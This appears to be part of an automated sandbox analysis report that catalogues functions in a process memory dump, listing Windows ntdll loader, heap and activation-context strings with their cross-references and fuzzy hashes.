Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01649A2A
minkernel\ntdll\ldrinit.c, xrefs: 01649A11, 01649A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01649A01

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: e79118c4f8d9371e6e3199fc098dc00f0bbaa9cf01b5f1204f222c24cbe48d1c
Instruction ID: ce18dcbdcee7c94eb007576d7303e8c268db41e0b83de53a9ab47c0654466ced
Opcode Fuzzy Hash: e79118c4f8d9371e6e3199fc098dc00f0bbaa9cf01b5f1204f222c24cbe48d1c
Instruction Fuzzy Hash: 1F51BF716483019FE725DF24CC45AAB77E9FB98788F00091EE9859F290D770E944CB96

Function 01622674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01662178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0166219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01662180
SXS: %s() passed the empty activation context, xrefs: 01662165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016621BF
RtlGetAssemblyStorageRoot, xrefs: 01662160, 0166219A, 016621BA

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 7d945e547a8cbd755042fc753ef109086239cf231de94d4ec797ac226b51fc96
Instruction ID: 4db0a1e9bb0138f3107d7793a7c07b2b58efe66cd577517bd3111e38458de911
Opcode Fuzzy Hash: 7d945e547a8cbd755042fc753ef109086239cf231de94d4ec797ac226b51fc96
Instruction Fuzzy Hash: 2A314836F04235BBF7218A9A8C61F6BBB7DEB64A51F05405DFB147B200D3709A01CBA1

Function 0162C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 0162C6C4
Loading import redirection DLL: '%wZ', xrefs: 01668170
LdrpInitializeImportRedirection, xrefs: 01668177, 016681EB
minkernel\ntdll\ldrredirect.c, xrefs: 01668181, 016681F5
minkernel\ntdll\ldrinit.c, xrefs: 0162C6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 016681E5

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 1d1a62aa0522781e537d48c05c0dcffe8ba2a348fba0b8a2a4bf3d55ab0b5328
Instruction ID: 0cf91ada59a05d8c345b3eca5554774775bc0757f71e7f5a425b1aa7b9b4effd
Opcode Fuzzy Hash: 1d1a62aa0522781e537d48c05c0dcffe8ba2a348fba0b8a2a4bf3d55ab0b5328
Instruction Fuzzy Hash: D431E2B16447169BC220EF69DD46E2AB7D9BF95B10F04065CF9806B391D620EC04CBA6

Function 0163096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01632DF0: LdrInitializeThunk.NTDLL ref: 01632DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630D74

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: b2ce20a6c649cf5e4ca66c2b0c8990143f021f567fd7d9d26b3850e80e536ddc
Instruction ID: 473290420e6f254fece59fc007a8500c85838b2067eb42f3a5ca3d01b87bca17
Opcode Fuzzy Hash: b2ce20a6c649cf5e4ca66c2b0c8990143f021f567fd7d9d26b3850e80e536ddc
Instruction Fuzzy Hash: BF423A76A00715DFDB21CF68CC80BAAB7F9BF44314F1445ADE989AB241D770AA85CF60

Function 015FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 015FA3E7
LdrResFallbackLangList Exit, xrefs: 015FA3FF
6, xrefs: 015FA3F7
LdrResFallbackLangList Enter, xrefs: 015FA3EF

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 420e72fe568b460d148ef30213b04a2ed0477149bfecf2922ae4e60b7b133a31
Instruction ID: e5fcaa236d39cb57cd2d6afd58b47b86858bbba4df23b3e36777e9b3acaa38a5
Opcode Fuzzy Hash: 420e72fe568b460d148ef30213b04a2ed0477149bfecf2922ae4e60b7b133a31
Instruction Fuzzy Hash: 91C18A75508382CFD711CF58C488B6AB7E4BF84704F04496EFA9A8B251E774C949CB67

Function 01628402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01628422
@, xrefs: 01628591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0162855E
minkernel\ntdll\ldrinit.c, xrefs: 01628421

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: b12c8be38d2497e0aa223191c2f229f0aa8e3d7a7ab4c6b8b09535d35d5b0208
Instruction ID: b68f264f5dad9a4c161e8ad20d78f5e5d1e73833b859a2385fb3487644ba3d38
Opcode Fuzzy Hash: b12c8be38d2497e0aa223191c2f229f0aa8e3d7a7ab4c6b8b09535d35d5b0208
Instruction Fuzzy Hash: 6891BA71508755AFD722DF65CC81EABBAECBF94688F40092EFA8597241E330D904CB66

Function 0162273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016621D9, 016622B1
.Local, xrefs: 016228D8
SXS: %s() passed the empty activation context, xrefs: 016621DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016622B6

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: a973fca0ebb8be779166d4a7e3387ab8ca1aef8e1caf38a2164d92465ace8a3e
Instruction ID: 99d3f0f333779f53fe304d2831f55ac05f52b691e90cba737c57831b596c6c18
Opcode Fuzzy Hash: a973fca0ebb8be779166d4a7e3387ab8ca1aef8e1caf38a2164d92465ace8a3e
Instruction Fuzzy Hash: 87A1BE31E0022A9BDB25CF69CC94BA9B3B5BF58314F1541EED908AB351D7709E81CF90

Function 01624AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01663437
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0166342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01663456
RtlDeactivateActivationContext, xrefs: 01663425, 01663432, 01663451

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: aa3345ee7c80e3f63e36259397c6fd53afd481c9aaf50f3ce89092267a7b628e
Instruction ID: 484049c8226dcd57b71ce9f761ec6255c78f3d6ae6511430378997e0df1c54be
Opcode Fuzzy Hash: aa3345ee7c80e3f63e36259397c6fd53afd481c9aaf50f3ce89092267a7b628e
Instruction Fuzzy Hash: D161F136611A229BD722DF1DCC41B2AF7E9BF80B51F14852DE9599B381DB30E801CB95

Function 015F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01650FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0165106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01651028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016510AE

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: a57f8b7fc6d4bf37ce994417e66e2afd6028d6966ed3c756a7ed9b7a53925fb1
Instruction ID: d386cab174b60365c705ad3979bed28835f67a789dbd51e7eebccebe5ae66580
Opcode Fuzzy Hash: a57f8b7fc6d4bf37ce994417e66e2afd6028d6966ed3c756a7ed9b7a53925fb1
Instruction Fuzzy Hash: 2371DEB19043059FCB21DF58CC88B9B7BE9AF95764F40046CFA488B246D734D588CB96

Function 0161245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01612462
LdrpDynamicShimModule, xrefs: 0165A998
minkernel\ntdll\ldrinit.c, xrefs: 0165A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0165A992

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 94824240c112b8093debefc6bcac51c9f9996b722c47ec8ef7cd5b6c140b7192
Instruction ID: dde0aac80b68f594ac2cc033691840c3587fdc4268226f29bcc60477b5a09d29
Opcode Fuzzy Hash: 94824240c112b8093debefc6bcac51c9f9996b722c47ec8ef7cd5b6c140b7192
Instruction Fuzzy Hash: 25316875A40202ABDB319F9DDC45AAA7BF5FB84B00F26025DED016F348C7705852CB90

Function 016029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01603255
HEAP: , xrefs: 01603264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0160327D

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 34925d22d32e33f6bbe3ad5a2acf94c3510bdc9c5945e3c96666efd7fe31af9b
Instruction ID: d9337c532324d10e4a92b09d0b40afc0cc01470120fea4a731b46345a89f4d95
Opcode Fuzzy Hash: 34925d22d32e33f6bbe3ad5a2acf94c3510bdc9c5945e3c96666efd7fe31af9b
Instruction Fuzzy Hash: 9392DD71A046499FDB2ACF68C8547AEBBF1FF48304F18809DE849AB391D735A946CF50

Function 01600770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 016550AE
(UCRBlock->Size >= *Size), xrefs: 016550CA
HEAP: , xrefs: 016550BD

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 050fddfe3e7150557571320079a36a8959b15bd1c52705cfe932190865add7a5
Instruction ID: 5bfe50059a688b410413a3177096ee0f8673255d6c5c7973d492e286b40edce5
Opcode Fuzzy Hash: 050fddfe3e7150557571320079a36a8959b15bd1c52705cfe932190865add7a5
Instruction Fuzzy Hash: B5F19F30600606DFEB2ACF68CC94B6ABBF5FF45344F1481A9E9169B391D734E981CB91

Function 01616962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0165CA51
@, xrefs: 01616C24

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: f69e0fed0c61deb64fb198997a915b5e7988e282fa0c9f1d8b1882486627c175
Instruction ID: 7c9ac884fac72ec90c557ba83f16eaa3e92c7ca741c36a08e38be97eff7030e9
Opcode Fuzzy Hash: f69e0fed0c61deb64fb198997a915b5e7988e282fa0c9f1d8b1882486627c175
Instruction Fuzzy Hash: 55C26D716083419FEB65CF28CC81BABBBE5AF88714F08892DE989C7345D774D845CB92

Function 015EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0164C2E6
UseFilter, xrefs: 015EA1C1
\??\, xrefs: 0164C1E4

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: ef238f954d3dbb60853930779197eceef1f5f61abbbe7e6d496d249a3aa459f3
Instruction ID: 6b5bdb0c12d078c02106c8b2aad81779da3bd9be10011695687f3644d570cf43
Opcode Fuzzy Hash: ef238f954d3dbb60853930779197eceef1f5f61abbbe7e6d496d249a3aa459f3
Instruction Fuzzy Hash: 43A16B719026299BDB31DF68CC88BEAB7B8FF44704F1001E9EA09A7250E7359E85CF54

Function 01610BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 0165A121
Failed to allocated memory for shimmed module list, xrefs: 0165A10F
LdrpCheckModule, xrefs: 0165A117

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 9ed80659abe501f8229962e0b5b414fb570aa5438a6e530e7f358b7ac2451d39
Instruction ID: 02a435b77f4bf36b2dbd3204e42332cc64fd089e55456690f67b6d66b9154248
Opcode Fuzzy Hash: 9ed80659abe501f8229962e0b5b414fb570aa5438a6e530e7f358b7ac2451d39
Instruction Fuzzy Hash: A371ED75A002069FDF25DFA8CD80AAEB7F5FB84204F18416DE902EB355E735A982CB50

Function 01600A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01655335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0165534D
HEAP: , xrefs: 01655342

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: b1272f45a338308efc3333cb5d581f4035fd6f0381127141eba159b79d360c55
Instruction ID: f4b336c1b84825dad92f6e6b0d397ab32f988045df87d9b1de1257280a318a8b
Opcode Fuzzy Hash: b1272f45a338308efc3333cb5d581f4035fd6f0381127141eba159b79d360c55
Instruction Fuzzy Hash: F1619C716007069FDB2ACF28C884B6ABBE1FF45744F14856DE85A8F392D771E881CB91

Function 0162C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 016682DE
minkernel\ntdll\ldrinit.c, xrefs: 016682E8
Failed to reallocate the system dirs string !, xrefs: 016682D7

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: f30098a7d9a5e100f1155cc0d36ed46182156b451f6a7da41c8c8ee1046ef5b2
Instruction ID: 47e45c8e2e1aea5e6bb917eb9f003b826d745ec7e4443423c978f284b0f67bf7
Opcode Fuzzy Hash: f30098a7d9a5e100f1155cc0d36ed46182156b451f6a7da41c8c8ee1046ef5b2
Instruction Fuzzy Hash: 9D41CEB1550721ABDB31EB68DC44B6B77E8AF98750F004A2EF9499B390E770D8108B96

Function 016AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016AC1C5
PreferredUILanguages, xrefs: 016AC212
@, xrefs: 016AC1F1

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 54793da9c292af87ece12213c5224253bb866c1824707cef51fc4dcf595e94a6
Instruction ID: a027407fd7b1477ffc9d3b693637f4a5b9dc9d893decf6f7a4a18279c04e6da5
Opcode Fuzzy Hash: 54793da9c292af87ece12213c5224253bb866c1824707cef51fc4dcf595e94a6
Instruction Fuzzy Hash: 7E416F72E0020AABDF15DAD8CC91FEEBBB9AB54704F54806AE609F7280D7749E458F50

Function 01684144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01684172
@, xrefs: 01684225
LdrpResValidateFilePath Enter, xrefs: 01684160

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: ce3e88351cd54ae8a9c08c7c2f05e1fddfa26ee4da8489636452ff926eb32f85
Instruction ID: 11fcf8f56fbe260f4636caaf1d61a4c6065b96a68d9a84dad2759d516248ada7
Opcode Fuzzy Hash: ce3e88351cd54ae8a9c08c7c2f05e1fddfa26ee4da8489636452ff926eb32f85
Instruction Fuzzy Hash: 59411332A0464A8FEB26EBA9CC50BADBBB5FF65340F14065ED941EB781DB358901CB10

Function 01674755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01674888
minkernel\ntdll\ldrredirect.c, xrefs: 01674899
LdrpCheckRedirection, xrefs: 0167488F

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: dcf302c0498fdbc1687c5a77a60e4a9905469c29585bde9219e84229ced3033b
Instruction ID: c0f4ea6a8c09fddca7087635a73344206452112ba468892e5358cb05183a7c79
Opcode Fuzzy Hash: dcf302c0498fdbc1687c5a77a60e4a9905469c29585bde9219e84229ced3033b
Instruction Fuzzy Hash: EB41D132A04655DFCB21CE6CDC48A26BBE9BF89A90F06066DED59DB351DB30D810CB91

Function 01600BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01655449
HEAP[%wZ]: , xrefs: 01655431
HEAP: , xrefs: 0165543E

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: ca1310ab086455e2241a4e375798ab17fd56783bd047b282a3d8759b43b24f2a
Instruction ID: b72e4d701fbe83518744e4689eaf0358fc757917fcd56506f8dcab25748181bc
Opcode Fuzzy Hash: ca1310ab086455e2241a4e375798ab17fd56783bd047b282a3d8759b43b24f2a
Instruction Fuzzy Hash: 8811DF313565429FDB6EDA18CC48B76BBA5EF40B16F18811EF806CF292EB30E842C755

Function 016720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01672104
Process initialization failed with status 0x%08lx, xrefs: 016720F3
LdrpInitializationFailure, xrefs: 016720FA

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 5da906bc51c34c14bbf825706aa7c1fda123acab0aca17a26efaf089b140410f
Instruction ID: 7dc33281124c6bbbf4586b8907e9fac700605b27a558b748dd933ae107a970b6
Opcode Fuzzy Hash: 5da906bc51c34c14bbf825706aa7c1fda123acab0aca17a26efaf089b140410f
Instruction Fuzzy Hash: 8FF0C279680308ABEB34EA4DEC63FA977A9FB41B54F10005DFB006F781D6B0A950CB95

Function 016003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01654D8A

Strings

#%u, xrefs: 01654D82

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 4142049863410c43acb3c667dde8d9ba0bcee13fa0864af81775e2b6ce04bfe7
Instruction ID: 24430363d41f947340a94cbe599ef8a173ca761bdc25d20491e3246a9eaf72e4
Opcode Fuzzy Hash: 4142049863410c43acb3c667dde8d9ba0bcee13fa0864af81775e2b6ce04bfe7
Instruction Fuzzy Hash: 7A715672A0014A9FDB06DFA8CD80BAEB7F9BF58344F150069E901A7391EB34ED41CB64

Function 015FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 015FAA25
LdrResSearchResource Enter, xrefs: 015FAA13

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 5663ef37e272c71dde448e8aacdd2aa0eae15effc3b801a3e28c48257778b1b3
Instruction ID: b34eaca32bb839f811def0d042a60d5d00e0caf2fdae0fff2d6fe6d08d661c00
Opcode Fuzzy Hash: 5663ef37e272c71dde448e8aacdd2aa0eae15effc3b801a3e28c48257778b1b3
Instruction Fuzzy Hash: 03E18E71A00209AFEB22CE99CD80BAEBBBABF44750F10452EEE05EB351D7749945CB51

Function 016BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 016BA44B
`, xrefs: 016BA551

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 223c0145924da40529989fc74f6a9389b416e54d51fe127406c21eb72fc555b4
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: F2C1E2712043429BE725CF68CC80BABBBE6AFC4314F084A2DF696CB291D775D585CB45

Function 0166E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0166E75A
UEFI, xrefs: 0166E751

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: bf02cfbe1d664179a62e9093729f991af733c68aaf48074f5d15f5b3a447bf14
Instruction ID: 79746843e243ae9d1d97ea43dda07cf307b1ad1a781185d6497ad7e80edcd343
